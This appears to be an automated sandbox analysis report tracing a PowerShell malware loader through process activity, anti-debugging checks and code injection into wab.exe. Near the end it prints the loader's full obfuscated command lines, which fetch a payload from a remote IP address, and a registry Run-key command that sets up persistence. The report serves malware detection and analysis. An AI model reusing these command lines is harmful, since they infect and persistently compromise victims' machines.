              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_07D28A88 sldt word ptr [eax]5_2_07D28A88
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5446Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4432Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6545Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3089Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeWindow / User API: threadDelayed 2844Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7660Thread sleep time: -3689348814741908s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7800Thread sleep count: 6545 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7804Thread sleep count: 3089 > 30Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7856Thread sleep time: -4611686018427385s >= -30000sJump to behavior
              Source: C:\Windows\System32\svchost.exe TID: 7460Thread sleep time: -30000s >= -30000sJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 9168Thread sleep count: 2844 > 30Jump to behavior
              Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeLast function: Thread delayed
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\Program Files (x86)\Windows Mail\wab.exeThread sleep count: Count: 2844 delay: -5Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: svchost.exe, 00000008.00000002.2883874527.000002087C858000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2882848775.000002087742B000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2885259023.00000000059B8000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000F.00000002.2885259023.0000000005959000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: wab.exe, 0000000F.00000002.2885259023.0000000005996000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWL
              Source: powershell.exe, 00000002.00000002.2507847603.00000210C4F01000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 15_2_0495404F LdrInitializeThunk,Sleep,NtProtectVirtualMemory,LdrInitializeThunk,15_2_0495404F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Writes to foreign memory regions
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4030000Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: C7FEE4Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplHGlobeS,beaBedudgrateMor.Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Pleurothotonus.Dil && echo $"Jump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Nabolandenes = 1;$Kapsle='S';$Kapsle+='ubstrin';$Kapsle+='g';Function Handig($Fyldepenneblkket){$Bytteforholdet=$Fyldepenneblkket.Length-$Nabolandenes;For($Columbaries=4; $Columbaries -lt $Bytteforholdet; $Columbaries+=(5)){$Festskriftets+=$Fyldepenneblkket.$Kapsle.Invoke( $Columbaries, $Nabolandenes);}$Festskriftets;}function Xerotherm($Drapers){& ($Normalprisen) ($Drapers);}$Palmehavers=Handig 'K njMResaoAfstznedsiFestl urlFokuaUnr /half5Re,u. Unb0bld Tan(PostWFrekiSpeenGarddv,cioInf.wSings Hea BracN RoqTL.at Babo1D,mi0Qq.a.Sten0Prop;Thec DefiWNonciEtagnOpry6Amel4Topc;Gela HetzxIndk6Comp4F.rt;Bill Erhvr Denv N.n:.syc1Basi2sdsu1ge t.Jens0 Spa)Prim UnboGStameSleec,fskkLovloMain/ .om2Nulp0Carb1F rr0Reor0Offi1.ykk0Ahis1Tffe TreF Twoiunwrr DiseSvrdfGattos,rix Ibr/Poli1Far.2Dump1 As .Enhy0Thus ';$Nysseliges=Handig ',undU Eges ignesnotr Ins-AlbuA,lleg,useeUpstnIsoitAnni ';$Fordommes=Handig ' odeh ZigtGacatJ,jup Fl,:.ent/B gg/ lor8Aden7Tors.Do.m1Mult2 Und1dy,n.unbr1cute0 Reg5Appl.Mast1 ic6A mb3Dete/FiltTUnexeKonsrwa.smAut.i rovnSka.aStocl PatjBipaoTigebD sk.OvertMetaoEkspcRhab ';$Problemanalysernes=Handig 'Uro.>Fe.l ';$Normalprisen=Handig 'Mic.iSkaaeRegex Str ';$Schizophasia='Heterozygotes';Xerotherm (Handig 'UndeSRegoePas.tDehu- Je C Stio UnsnGeomtUnteeTalln Re.tSpir Stil-BeatPImpra StetplurhSl.g Ko,mT H.b:Part\Sp,nK.also,mpir AlysNitre W mtSemisMonr.T.att Ch xs,nstDisp ,fsk-FuglV La,aTipslSkaruLa,se Bo lr t$ uscSMisac HydhR.kei looz KigoRep.pLderhAcicaDisrsAppeiAggra,rro;Ge e ');Xerotherm (Handig ' S,pi Chef ,or Labr(AaletFacoe TorsDub tindk- StrpMalaaHeavtTi.eh,ndi H neT Li.:sp l\DemoKAbsooRekorMenisA.foeUnsctUn es.eta.UnibtBentx Adet A.s)Kvin{eksae Pasx,oeci RentEqua} Fer;trop ');$Wedeln = Handig 'NonmedemycBedeh iewoFor edan%kon.al,plpFarmpMakedAra aWoodtBisuaRaft% Gen\Ma,ePRikslTilleSpaau oodrFun.oSenstForbhC.mpoLys,t Tito Ca nUnblu Ma,sAmer.ImprDDistiDi,il Las Gara&Post&Staf C,loeF.tocGennhFangoChi, Tor$Over ';Xerotherm (Handig 'tore$ mangOthilTriloUnstbTr,na.aval ove:paabSOpt.w EngeDir.eLus pAntryT pe=Gaze(S ecc StrmPnhedUdda Fejl/,avlcPr t Utl$,agsWTrine,ilbd DydeFly.lTy.inKar.)Plat ');Xerotherm (Handig 'Pr s$BriegStral ,odoNo,ib ,ndaIntelSu.e:FacoD CleeDo.ab PriaNarktbeeftKonte VaraBramtUds.rCam eIc.nn StoeUtths Reu=Tall$PlamFAn.no F rrStradc.iboDisgmNstemIns,eKlarsCali.Pr bsdetepKr,vlReaciSangt Urf(Gill$TeisP Sk.rE spoPrombB tol DomeCuttmT,lda.allnRhamaJordlopryyPicksWo keArtsrBox.n PrleA,etsAfsp)Slad ');$Fordommes=$Debatteatrenes[0];Xerotherm (Handig ' era$Leucg irklSpeeoF.nabEncaaBal,lCent:B atUStj.rOplaeAmphtGeore f arSouroBagggfor.r ephaLoc.pA sehBars=AlfaN redeKaglwBlyg- accO AntbForlj BoneUgudcAntetDiff LogaSPulvyKonfs A btBilleN,dumMikr.AtomNSysteHetetM.ni.,andWMarke.ussb Si.CS lvlPh.ni P,ceNondnQuintOpsp ');Xerotherm (Handig 'Spin$,jouUBehjrAnt,eTro,tAfstebrikrI.dsoArbegSupprAdgaaReflp Ambh Ec..ToplHJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Pleurothotonus.Dil && echo $"Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
              Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)"Jump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Stagenes" /t REG_EXPAND_SZ /d "%Frihjulets% -w 1 $Gyps224=(Get-ItemProperty -Path 'HKCU:\Bundfloraernes\').Equalized;%Frihjulets% ($Gyps224)"Jump to behavior
